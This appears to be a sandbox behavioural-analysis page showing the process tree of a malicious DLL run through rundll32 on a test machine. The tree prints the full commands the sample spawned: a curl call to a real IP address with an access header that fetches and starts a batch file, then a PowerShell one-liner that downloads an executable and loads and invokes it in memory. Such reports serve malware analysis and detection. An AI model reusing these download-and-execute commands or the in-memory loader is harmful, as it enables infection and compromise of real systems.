| ZeroBOX

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\iviewers.dll,DllRegisterServer
2084
- cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
  2272
  - curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat
    2360
  - cmd.exe C:\Windows\system32\cmd.exe /K AppS.bat
    2424
    - powershell.exe powershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
      2516
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\iviewers.dll,
2196

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis